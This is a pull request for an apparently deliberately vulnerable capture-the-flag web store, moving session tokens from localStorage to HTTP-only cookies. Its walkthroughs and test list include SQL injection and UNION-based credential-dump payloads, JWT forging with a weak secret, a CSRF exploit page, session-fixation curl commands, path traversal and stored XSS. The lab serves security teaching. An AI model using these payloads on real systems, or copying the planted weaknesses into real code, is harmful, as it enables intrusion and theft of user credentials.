### PR TITLE
refactor: migrate auth from localStorage to HTTP-only cookies for realistic CSRF

### DIFF
--- a/app/admin/AdminClient.tsx
+++ b/app/admin/AdminClient.tsx
@@ -27,18 +27,13 @@ export default function AdminClient() {
     const fetchData = async () => {
       try {
         const baseUrl = getBaseUrl();
-        const token = localStorage.getItem("authToken");
 
         const [adminResponse, ordersResponse] = await Promise.all([
           fetch(`${baseUrl}/api/admin`, {
-            headers: {
-              Authorization: `Bearer ${token}`,
-            },
+            credentials: "include",
           }),
           fetch(`${baseUrl}/api/orders`, {
-            headers: {
-              Authorization: `Bearer ${token}`,
-            },
+            credentials: "include",
           }),
         ]);
 
@@ -91,13 +86,12 @@ export default function AdminClient() {
 
     try {
       const baseUrl = getBaseUrl();
-      const token = localStorage.getItem("authToken");
 
       const response = await fetch(`${baseUrl}/api/orders/${orderId}`, {
         method: "PATCH",
+        credentials: "include",
         headers: {
           "Content-Type": "application/json",
-          Authorization: `Bearer ${token}`,
         },
         body: JSON.stringify({ status: newStatus }),
       });

--- a/app/admin/analytics/AnalyticsClient.tsx
+++ b/app/admin/analytics/AnalyticsClient.tsx
@@ -55,15 +55,12 @@ export default function AnalyticsClient() {
   const fetchAnalytics = useCallback(
     async (ip?: string) => {
       try {
-        const token = localStorage.getItem("authToken");
         const url = ip
           ? `/api/admin/analytics?ip=${encodeURIComponent(ip)}`
           : "/api/admin/analytics";
 
         const response = await fetch(url, {
-          headers: {
-            Authorization: `Bearer ${token}`,
-          },
+          credentials: "include",
         });
 
         if (!response.ok) {

--- a/app/admin/documents/DocumentsClient.tsx
+++ b/app/admin/documents/DocumentsClient.tsx
@@ -45,11 +45,10 @@ export default function DocumentsClient() {
 
   const fetchDirectoryListing = async (path: string) => {
     const baseUrl = getBaseUrl();
-    const token = localStorage.getItem("authToken");
     const response = await fetch(
       `${baseUrl}/api/files?list=true&path=${encodeURIComponent(path)}`,
       {
-        headers: { Authorization: `Bearer ${token}` },
+        credentials: "include",
       }
     );
     if (!response.ok) throw new Error("Failed to fetch directory listing");
@@ -64,12 +63,9 @@ export default function DocumentsClient() {
 
     try {
       const baseUrl = getBaseUrl();
-      const token = localStorage.getItem("authToken");
 
       if (file.toLowerCase().endsWith(".pdf")) {
-        setPdfUrl(
-          `${baseUrl}/api/files?file=${encodeURIComponent(file)}&token=${token}`
-        );
+        setPdfUrl(`${baseUrl}/api/files?file=${encodeURIComponent(file)}`);
         setIsLoading(false);
         return;
       }
@@ -77,7 +73,7 @@ export default function DocumentsClient() {
       const response = await fetch(
         `${baseUrl}/api/files?file=${encodeURIComponent(file)}`,
         {
-          headers: { Authorization: `Bearer ${token}` },
+          credentials: "include",
         }
       );
 
@@ -134,13 +130,10 @@ export default function DocumentsClient() {
       }
 
       const baseUrl = getBaseUrl();
-      const token = localStorage.getItem("authToken");
 
       try {
         const response = await fetch(`${baseUrl}/api/admin`, {
-          headers: {
-            Authorization: `Bearer ${token}`,
-          },
+          credentials: "include",
         });
 
         if (!response.ok) {

--- a/app/admin/products/ProductsManagementClient.tsx
+++ b/app/admin/products/ProductsManagementClient.tsx
@@ -31,12 +31,9 @@ export default function ProductsManagementClient() {
     const fetchProducts = async () => {
       try {
         const baseUrl = getBaseUrl();
-        const token = localStorage.getItem("authToken");
 
         const response = await fetch(`${baseUrl}/api/admin/products`, {
-          headers: {
-            Authorization: `Bearer ${token}`,
-          },
+          credentials: "include",
         });
 
         if (!response.ok) {
@@ -91,7 +88,6 @@ export default function ProductsManagementClient() {
 
     try {
       const baseUrl = getBaseUrl();
-      const token = localStorage.getItem("authToken");
 
       const formData = new FormData();
       formData.append("image", file);
@@ -100,9 +96,7 @@ export default function ProductsManagementClient() {
         `${baseUrl}/api/admin/products/${productId}/image`,
         {
           method: "POST",
-          headers: {
-            Authorization: `Bearer ${token}`,
-          },
+          credentials: "include",
           body: formData,
         }
       );

--- a/app/api/admin/route.ts
+++ b/app/api/admin/route.ts
@@ -12,8 +12,7 @@ interface ExtendedJWTPayload {
 
 export async function GET(request: NextRequest) {
   try {
-    const authHeader = request.headers.get("authorization");
-    const token = authHeader?.replace("Bearer ", "") || null;
+    const token = request.cookies.get("authToken")?.value ?? null;
 
     if (!token) {
       return NextResponse.json({ error: "Unauthorized" }, { status: 401 });
@@ -73,6 +72,7 @@ export async function GET(request: NextRequest) {
       "alice@example.com",
       "bob@example.com",
       "admin@oss.com",
+      "vis.bruta@example.com",
     ];
 
     if (dbUser.role === "ADMIN" && !expectedEmails.includes(dbUser.email)) {

--- a/app/api/admin/support-audit/route.ts
+++ b/app/api/admin/support-audit/route.ts
@@ -12,8 +12,7 @@ interface ExtendedJWTPayload {
 
 export async function GET(request: NextRequest) {
   try {
-    const authHeader = request.headers.get("authorization");
-    const token = authHeader?.replace("Bearer ", "") || null;
+    const token = request.cookies.get("authToken")?.value ?? null;
 
     if (!token) {
       return NextResponse.json({ error: "Unauthorized" }, { status: 401 });

--- a/app/api/auth/login/route.ts
+++ b/app/api/auth/login/route.ts
@@ -1,6 +1,6 @@
 import { NextResponse } from "next/server";
 import { prisma } from "@/lib/prisma";
-import { hashMD5, createWeakJWT } from "@/lib/server-auth";
+import { hashMD5, createWeakJWT, setAuthCookie } from "@/lib/server-auth";
 
 export async function POST(request: Request) {
   try {
@@ -57,8 +57,7 @@ export async function POST(request: Request) {
       }
     }
 
-    return NextResponse.json({
-      token,
+    const response = NextResponse.json({
       user: {
         id: user.id,
         email: user.email,
@@ -66,6 +65,10 @@ export async function POST(request: Request) {
       },
       flag: flagData,
     });
+
+    setAuthCookie(response, token);
+
+    return response;
   } catch (error) {
     console.error("Error during login:", error);
     return NextResponse.json(

--- a/app/api/auth/logout/route.ts
+++ b/app/api/auth/logout/route.ts
@@ -1,0 +1,8 @@
+import { NextResponse } from "next/server";
+import { clearAuthCookie } from "@/lib/server-auth";
+
+export async function POST() {
+  const response = NextResponse.json({ success: true });
+  clearAuthCookie(response);
+  return response;
+}

--- a/app/api/auth/signup/route.ts
+++ b/app/api/auth/signup/route.ts
@@ -1,7 +1,7 @@
 import { NextResponse } from "next/server";
 import { prisma } from "@/lib/prisma";
 import { UserRole } from "@/lib/generated/prisma/enums";
-import { hashMD5, createWeakJWT } from "@/lib/server-auth";
+import { hashMD5, createWeakJWT, setAuthCookie } from "@/lib/server-auth";
 
 const DEFAULT_ADDRESS_ID = "addr-default-001";
 
@@ -79,14 +79,17 @@ export async function POST(request: Request) {
       exp: Math.floor(Date.now() / 1000) + 60 * 60 * 24 * 7,
     });
 
-    return NextResponse.json({
-      token,
+    const response = NextResponse.json({
       user: {
         id: user.id,
         email: user.email,
         role: user.role,
       },
     });
+
+    setAuthCookie(response, token);
+
+    return response;
   } catch (error) {
     console.error("Error during signup:", error);
     return NextResponse.json(

--- a/app/api/auth/support-login/route.ts
+++ b/app/api/auth/support-login/route.ts
@@ -1,6 +1,6 @@
 import { NextRequest, NextResponse } from "next/server";
 import { prisma } from "@/lib/prisma";
-import { createWeakJWT } from "@/lib/server-auth";
+import { createWeakJWT, setAuthCookie } from "@/lib/server-auth";
 
 export async function GET(request: NextRequest) {
   try {
@@ -50,14 +50,17 @@ export async function GET(request: NextRequest) {
       supportAccess: true,
     });
 
-    return NextResponse.json({
-      token: authToken,
+    const response = NextResponse.json({
       user: {
         id: supportToken.user.id,
         email: supportToken.user.email,
         role: supportToken.user.role,
       },
     });
+
+    setAuthCookie(response, authToken);
+
+    return response;
   } catch (error) {
     console.error("Error during support login:", error);
     return NextResponse.json(

--- a/app/login/LoginForm.tsx
+++ b/app/login/LoginForm.tsx
@@ -19,27 +19,23 @@ export default function LoginForm() {
 
     try {
       const data = await api.post<{
-        token: string;
         user: { id: string; email: string; role: string };
         flag?: string | null;
-      }>("/api/auth/login", { email, password }, { requireAuth: false });
+      }>("/api/auth/login", { email, password });
 
-      if (data.token) {
-        localStorage.setItem("authToken", data.token);
-        localStorage.setItem("user", JSON.stringify(data.user));
-        window.dispatchEvent(new Event("storage"));
+      localStorage.setItem("user", JSON.stringify(data.user));
+      window.dispatchEvent(new Event("storage"));
 
-        if (data.flag) {
-          localStorage.setItem("pendingFlag", data.flag);
-        }
-
-        if (data.user?.role === "ADMIN") {
-          router.push("/admin");
-        } else {
-          router.push("/");
-        }
-        router.refresh();
+      if (data.flag) {
+        localStorage.setItem("pendingFlag", data.flag);
       }
+
+      if (data.user?.role === "ADMIN") {
+        router.push("/admin");
+      } else {
+        router.push("/");
+      }
+      router.refresh();
     } catch (error) {
       const errorMessage =
         error instanceof ApiError

--- a/app/orders/search/OrderSearchClient.tsx
+++ b/app/orders/search/OrderSearchClient.tsx
@@ -36,13 +36,12 @@ export default function OrderSearchClient() {
 
     try {
       const baseUrl = getBaseUrl();
-      const token = localStorage.getItem("authToken");
 
       const response = await fetch(`${baseUrl}/api/orders/search`, {
         method: "POST",
+        credentials: "include",
         headers: {
           "Content-Type": "application/json",
-          Authorization: `Bearer ${token}`,
         },
         body: JSON.stringify({}),
       });

--- a/app/products/[id]/ProductDetailClient.tsx
+++ b/app/products/[id]/ProductDetailClient.tsx
@@ -27,8 +27,7 @@ export default function ProductDetailClient({
     try {
       setIsLoadingReviews(true);
       const data = await api.get<Review[]>(
-        `/api/products/${product.id}/reviews`,
-        { requireAuth: false }
+        `/api/products/${product.id}/reviews`
       );
       setReviews(data);
     } catch (error) {

--- a/app/profile/ProfileClient.tsx
+++ b/app/profile/ProfileClient.tsx
@@ -80,12 +80,11 @@ export default function ProfileClient() {
     setExportResult(null);
 
     try {
-      const token = localStorage.getItem("authToken");
       const response = await fetch("/api/user/export", {
         method: "POST",
+        credentials: "include",
         headers: {
           "Content-Type": "application/json",
-          Authorization: `Bearer ${token}`,
         },
         body: JSON.stringify({
           format: exportFormat,
@@ -135,11 +134,8 @@ export default function ProfileClient() {
 
   const fetchSupportToken = async () => {
     try {
-      const token = localStorage.getItem("authToken");
       const response = await fetch("/api/user/support-access", {
-        headers: {
-          Authorization: `Bearer ${token}`,
-        },
+        credentials: "include",
       });
       const data = await response.json();
       if (data.supportToken) {
@@ -156,12 +152,11 @@ export default function ProfileClient() {
     setSupportSuccess(null);
 
     try {
-      const token = localStorage.getItem("authToken");
       const response = await fetch("/api/user/support-access", {
         method: "POST",
+        credentials: "include",
         headers: {
           "Content-Type": "application/json",
-          Authorization: `Bearer ${token}`,
         },
         body: JSON.stringify({}),
       });
@@ -188,12 +183,9 @@ export default function ProfileClient() {
     setSupportSuccess(null);
 
     try {
-      const token = localStorage.getItem("authToken");
       const response = await fetch("/api/user/support-access", {
         method: "DELETE",
-        headers: {
-          Authorization: `Bearer ${token}`,
-        },
+        credentials: "include",
       });
 
       if (!response.ok) {

--- a/app/signup/SignupForm.tsx
+++ b/app/signup/SignupForm.tsx
@@ -30,21 +30,17 @@ export default function SignupForm() {
 
     try {
       const data = await api.post<{
-        token: string;
         user: { id: string; email: string; role: string };
-      }>("/api/auth/signup", { email, password }, { requireAuth: false });
+      }>("/api/auth/signup", { email, password });
 
-      if (data.token) {
-        localStorage.setItem("authToken", data.token);
-        localStorage.setItem("user", JSON.stringify(data.user));
-        window.dispatchEvent(new Event("storage"));
-        if (data.user?.role === "ADMIN") {
-          router.push("/admin");
-        } else {
-          router.push("/");
-        }
-        router.refresh();
+      localStorage.setItem("user", JSON.stringify(data.user));
+      window.dispatchEvent(new Event("storage"));
+      if (data.user?.role === "ADMIN") {
+        router.push("/admin");
+      } else {
+        router.push("/");
       }
+      router.refresh();
     } catch (error) {
       const errorMessage =
         error instanceof ApiError

--- a/app/support-login/page.tsx
+++ b/app/support-login/page.tsx
@@ -29,8 +29,7 @@ function SupportLoginContent() {
           return;
         }
 
-        if (data.token && data.user) {
-          localStorage.setItem("authToken", data.token);
+        if (data.user) {
           localStorage.setItem("user", JSON.stringify(data.user));
           window.dispatchEvent(new Event("storage"));
           router.push("/profile");

--- a/app/support/SupportForm.tsx
+++ b/app/support/SupportForm.tsx
@@ -32,16 +32,12 @@ export default function SupportForm() {
           description: string;
           screenshotContent?: string;
         };
-      }>(
-        "/api/support",
-        {
-          email,
-          title,
-          description,
-          screenshotUrl: screenshotUrl || undefined,
-        },
-        { requireAuth: false }
-      );
+      }>("/api/support", {
+        email,
+        title,
+        description,
+        screenshotUrl: screenshotUrl || undefined,
+      });
 
       setSubmittedData(data.data);
       setIsLoading(false);

--- a/content/vulnerabilities/information-disclosure-api-error.md
+++ b/content/vulnerabilities/information-disclosure-api-error.md
@@ -36,13 +36,10 @@ To retrieve the flag `OSS{1nf0_d1scl0sur3_4p1_3rr0r}`, follow these steps:
 **Using browser console:**
 
 ```javascript
-const token = localStorage.getItem("authToken");
 fetch("/api/user/export", {
   method: "POST",
-  headers: {
-    "Content-Type": "application/json",
-    Authorization: `Bearer ${token}`,
-  },
+  credentials: "include",
+  headers: { "Content-Type": "application/json" },
   body: JSON.stringify({
     format: "json",
     fields: "invalid_field",

--- a/content/vulnerabilities/session-fixation-weak-session-management.md
+++ b/content/vulnerabilities/session-fixation-weak-session-management.md
@@ -119,15 +119,14 @@ To retrieve the flag `OSS{s3ss10n_f1x4t10n_4tt4ck}`, follow these steps:
 You can also exploit this using curl:
 
 ```bash
-# Login as regular user first to get auth token
-curl -X POST http://localhost:3000/api/auth/login \
+# Login as regular user first to get the auth cookie
+curl -c cookies.txt -X POST http://localhost:3000/api/auth/login \
   -H "Content-Type: application/json" \
   -d '{"email":"alice@example.com","password":"iloveduck"}'
 
 # Generate support token for admin (session fixation)
-curl -X POST http://localhost:3000/api/user/support-access \
+curl -b cookies.txt -X POST http://localhost:3000/api/user/support-access \
   -H "Content-Type: application/json" \
-  -H "Authorization: Bearer <your_auth_token>" \
   -d '{"email":"admin@oss.com"}'
 
 # Use the support token to access admin

--- a/content/vulnerabilities/sql-injection.md
+++ b/content/vulnerabilities/sql-injection.md
@@ -81,13 +81,10 @@ You can also intercept and modify the request programmatically:
 2. Navigate to the Console tab
 3. Execute the following JavaScript to send a malicious request:
    ```javascript
-   const token = localStorage.getItem("authToken");
    fetch("/api/orders/search", {
      method: "POST",
-     headers: {
-       "Content-Type": "application/json",
-       Authorization: `Bearer ${token}`,
-     },
+     credentials: "include",
+     headers: { "Content-Type": "application/json" },
      body: JSON.stringify({ status: "DELIVERED' OR 1=1--" }),
    })
      .then((r) => r.json())

--- a/content/vulnerabilities/weak-md5-hashing.md
+++ b/content/vulnerabilities/weak-md5-hashing.md
@@ -88,13 +88,10 @@ curl "http://localhost:3000/api/products/search?q='%20UNION%20SELECT%20id,%20ema
 2. Navigate to Order Search (`/orders/search`)
 3. Using browser dev tools or curl, send a malicious request:
    ```javascript
-   const token = localStorage.getItem("authToken");
    fetch("/api/orders/search", {
      method: "POST",
-     headers: {
-       "Content-Type": "application/json",
-       Authorization: `Bearer ${token}`,
-     },
+     credentials: "include",
+     headers: { "Content-Type": "application/json" },
      body: JSON.stringify({
        status:
          "' UNION SELECT id, email, password, role, id, email, password, role, role FROM users--",

--- a/docs/src/data/blog/bola-wishlist-access.md
+++ b/docs/src/data/blog/bola-wishlist-access.md
@@ -57,7 +57,7 @@ Open the browser developer tools (Network tab) and click "View Wishlist" on one 
 
 ```
 GET /api/wishlists/wl-alice-001
-Authorization: Bearer <your-jwt-token>
+Cookie: authToken=<your-jwt-token>
 ```
 
 The response includes the full wishlist data: name, items, owner email, and notes.
@@ -77,16 +77,15 @@ The question becomes: does the API enforce ownership verification, or does it re
 Modify the API request to target a different wishlist. Using curl or the browser console:
 
 ```bash
-curl -H "Authorization: Bearer <your-jwt-token>" \
+curl -b "authToken=<your-jwt-token>" \
   http://localhost:3000/api/wishlists/wl-internal-001
 ```
 
 Or in the browser console:
 
 ```javascript
-const token = localStorage.getItem("authToken");
 const res = await fetch("/api/wishlists/wl-internal-001", {
-  headers: { Authorization: `Bearer ${token}` },
+  credentials: "include",
 });
 const data = await res.json();
 console.log(data);

--- a/docs/src/data/blog/jwt-weak-secret-admin-bypass.md
+++ b/docs/src/data/blog/jwt-weak-secret-admin-bypass.md
@@ -32,7 +32,7 @@ The installer retrieves dependencies, initializes a local SQLite database, seeds
 
 ## Reconnaissance
 
-The application uses JSON Web Tokens for session management. After successful authentication, the backend issues a token that is stored in the browser's local storage and transmitted with subsequent requests.
+The application uses JSON Web Tokens for session management. After successful authentication, the backend issues a token that is stored in an HTTP-only cookie and automatically transmitted with subsequent requests.
 
 The application footer contains a visible link to `/admin`. Attempting to access this endpoint while authenticated as a customer account results in an access denied response, indicating role-based access control is enforced.
 
@@ -40,7 +40,7 @@ The application footer contains a visible link to `/admin`. Attempting to access
 
 ## Token extraction and analysis
 
-Open the browser's developer tools and navigate to Application > Local Storage. The authentication token is stored under the key `authToken`.
+Open the browser's developer tools and navigate to Application > Cookies. The authentication token is stored in an HTTP-only cookie named `authToken`.
 
 Decoding this token using [jwt.io](https://jwt.io) reveals the following structure:
 
@@ -142,7 +142,7 @@ forged_token = jwt.encode(payload, "secret", algorithm="HS256")
 print(forged_token)
 ```
 
-Replace the `authToken` value in local storage with the forged token and refresh the page. Navigate to `/admin` to confirm successful privilege escalation.
+Replace the `authToken` cookie value in Application > Cookies with the forged token and refresh the page. Navigate to `/admin` to confirm successful privilege escalation. Note: although the cookie is `httpOnly` (not accessible via JavaScript), you can still edit its value directly in DevTools.
 
 ![Admin page](../../assets/images/jwt-weak-secret-admin-bypass/admin-flag.png)
 

--- a/docs/src/data/blog/x-forwarded-for-sql-injection.md
+++ b/docs/src/data/blog/x-forwarded-for-sql-injection.md
@@ -188,9 +188,9 @@ curl -X POST http://localhost:3000/api/tracking \
 1. The XSS payload is stored in the database as the "IP address"
 2. Every time an admin visits `/admin/analytics`, the script executes
 3. The attacker can:
-   - Steal the admin's JWT token from localStorage
-   - Perform actions as admin (create users, modify products, etc.)
+   - Perform actions as admin (create users, modify products, etc.) by making fetch requests with `credentials: "include"`
    - Exfiltrate sensitive analytics data
+   - Note: the JWT is stored in an `httpOnly` cookie, so it cannot be directly stolen via JavaScript, but the attacker can still make authenticated requests from the XSS context
 
 ![XSS](../../assets/images/x-forwarded-for-sql-injection/xss.png)
 

--- a/hooks/useAuth.ts
+++ b/hooks/useAuth.ts
@@ -25,7 +25,8 @@ export function useAuth() {
     };
   }, [user]);
 
-  const logout = () => {
+  const logout = async () => {
+    await fetch("/api/auth/logout", { method: "POST", credentials: "include" });
     clearAuth();
     setUser(null);
   };

--- a/lib/api.ts
+++ b/lib/api.ts
@@ -1,5 +1,4 @@
 import { getBaseUrl } from "./config";
-import { getAuthToken } from "./client-auth";
 
 type RequestMethod = "GET" | "POST" | "PATCH" | "DELETE" | "PUT";
 
@@ -7,7 +6,6 @@ interface RequestOptions {
   method?: RequestMethod;
   body?: unknown;
   headers?: Record<string, string>;
-  requireAuth?: boolean;
   cache?: RequestCache;
 }
 
@@ -27,13 +25,7 @@ async function apiRequest<T>(
   endpoint: string,
   options: RequestOptions = {}
 ): Promise<T> {
-  const {
-    method = "GET",
-    body,
-    headers = {},
-    requireAuth = true,
-    cache,
-  } = options;
+  const { method = "GET", body, headers = {}, cache } = options;
 
   const baseUrl = getBaseUrl();
   const url = `${baseUrl}${endpoint.startsWith("/") ? endpoint : `/${endpoint}`}`;
@@ -43,16 +35,10 @@ async function apiRequest<T>(
     ...headers,
   };
 
-  if (requireAuth) {
-    const token = getAuthToken();
-    if (token) {
-      requestHeaders.Authorization = `Bearer ${token}`;
-    }
-  }
-
   const fetchOptions: RequestInit = {
     method,
     headers: requestHeaders,
+    credentials: "include",
   };
 
   if (body) {

--- a/lib/client-auth.ts
+++ b/lib/client-auth.ts
@@ -10,20 +10,13 @@ export function getStoredUser(): User | null {
       return JSON.parse(storedUser);
     } catch {
       localStorage.removeItem("user");
-      localStorage.removeItem("authToken");
       return null;
     }
   }
   return null;
 }
 
-export function getAuthToken(): string | null {
-  if (typeof window === "undefined") return null;
-  return localStorage.getItem("authToken");
-}
-
 export function clearAuth(): void {
   if (typeof window === "undefined") return;
-  localStorage.removeItem("authToken");
   localStorage.removeItem("user");
 }

--- a/prisma/seed.ts
+++ b/prisma/seed.ts
@@ -230,7 +230,7 @@ const flagHints: Record<string, string[]> = {
   "cross-site-request-forgery": [
     "Sometimes the most dangerous links are the ones you can't see.",
     "The admin dashboard hints at hidden content. Inspect the page source for links styled with display:none, one leads to a proof-of-concept demonstration.",
-    "View the source of the admin page and find the hidden link to /exploits/csrf-attack.html. Visit it while logged in, the page demonstrates a CSRF attack by submitting a forged request. The server detects the cross-origin attempt and reveals the flag.",
+    "View the source of the admin page and find the hidden link to /exploits/csrf-attack.html. Visit it while logged in as admin. The page uses your authentication cookie to submit a forged request that changes an order status, and the flag is returned in the response.",
   ],
   "mass-assignment": [
     "The signup form shows you some fields. The API accepts more.",

--- a/public/exploits/csrf-attack.html
+++ b/public/exploits/csrf-attack.html
@@ -599,20 +599,19 @@
               <strong>CSRF Attack Demonstration - Important Note:</strong>
               <span>This page simulates a CSRF attack.</span>
               <span
-                ><strong>This demonstration uses localStorage:</strong> The page
-                reads your authentication token from localStorage and uses it to
-                execute an unauthorized operation. This works because the
-                malicious page is hosted on the same domain as the application
-                (same-origin policy allows access to localStorage).</span
+                ><strong>How this attack works:</strong> The application uses
+                HTTP-only cookies for authentication. When you click the button,
+                a request is sent to the API with
+                <code>credentials: "include"</code>, causing the browser to
+                automatically attach your authentication cookie. No JavaScript
+                access to the token is needed.</span
               >
               <span
-                ><strong>In a real-world CSRF attack:</strong> The application
-                would use cookies for authentication instead of localStorage. In
-                that scenario, the attack would work from any external domain
-                because browsers automatically include cookies with cross-origin
-                requests (when sameSite is not set to "strict"). The attacker
-                wouldn't need access to localStorage - a simple HTML form
-                submission would be sufficient.</span
+                ><strong>Why this works:</strong> The authentication cookie is
+                set with <code>sameSite: "lax"</code>, which allows cookies to
+                be sent on same-origin requests. A stricter
+                <code>sameSite: "strict"</code> policy or CSRF tokens would
+                prevent this attack.</span
               >
             </div>
           </div>
@@ -645,20 +644,13 @@
 
     <script>
       async function submitForm() {
-        const token = localStorage.getItem("authToken");
-
-        if (!token) {
-          alert("You must be logged in for this attack to work!");
-          return;
-        }
-
         try {
           const baseUrl = window.location.origin;
           const response = await fetch(`${baseUrl}/api/orders/ORD-003`, {
             method: "POST",
+            credentials: "include",
             headers: {
               "Content-Type": "application/json",
-              Authorization: `Bearer ${token}`,
             },
             body: JSON.stringify({
               status: "DELIVERED",
@@ -676,7 +668,13 @@
               console.log("Flag:", data.flag);
             }
           } else {
-            alert("Failed to update order: " + (data.error || "Unknown error"));
+            if (response.status === 401) {
+              alert("You must be logged in for this attack to work!");
+            } else {
+              alert(
+                "Failed to update order: " + (data.error || "Unknown error")
+              );
+            }
           }
         } catch (error) {
           alert("Error: " + error.message);


### PR DESCRIPTION
- Move JWT from localStorage to httpOnly cookies with sameSite:lax
- Update all API endpoints to read from cookies instead of Authorization header
- Remove Authorization header injection from api.ts
- Add credentials:include to all fetch requests
- Update CSRF exploit page to demonstrate cookie-based attack
- Update all documentation and blog walkthroughs
- Create logout endpoint to clear auth cookie
- Ensure CSRF vulnerability accurately reflects real-world attack vectors

Issue: https://github.com/kOaDT/oss-oopssec-store/issues/25

### Tests

- [x] Login - Log in as alice@example.com / iloveduck. Check DevTools > Application > Cookies: authToken cookie should be present with httpOnly flag
- [x] Signup - Create a new account. Verify cookie is set, no token in localStorage
- [x] Logout - Click logout. Verify cookie is cleared (no more authToken in Cookies)
- [x] Admin access (JWT weak secret) - Extract cookie value from DevTools > Cookies, decode on jwt.io, forge with role: "ADMIN" and secret "secret", edit cookie value in DevTools, navigate to /admin
- [x] CSRF attack - While logged in as admin, visit /exploits/csrf-attack.html, click "Secure My Account Now". The flag should appear in the console
- [x] Session fixation - Log in as alice, go to Profile > Support Access, intercept the POST request and add {"email":"admin@oss.com"}, use the returned support URL to log in as admin
- [x] Mass assignment - Sign up with {"email":"...", "password":"...", "role":"ADMIN"} via Burp, verify admin access
- [x] SQL injection (orders) - While logged in, send a POST to /api/orders/search with SQL injection payload in status field (use credentials: "include")
- [x] IDOR - While logged in, navigate to /order?id=ORD-001 (someone else's order)
- [x] Information disclosure - POST to /api/user/export with {"format":"json","fields":"invalid_field"} using credentials: "include"
- [x] BOLA - GET /api/wishlists/wl-internal-001 with credentials: "include"
- [x] X-Forwarded-For SQLi - Send a POST to /api/tracking with SQL in the X-Forwarded-For header, check flag in admin analytics
- [x] Path traversal - Access /api/files?file=../flag.txt
- [x] XSS - Submit a review with <script> tag on a product page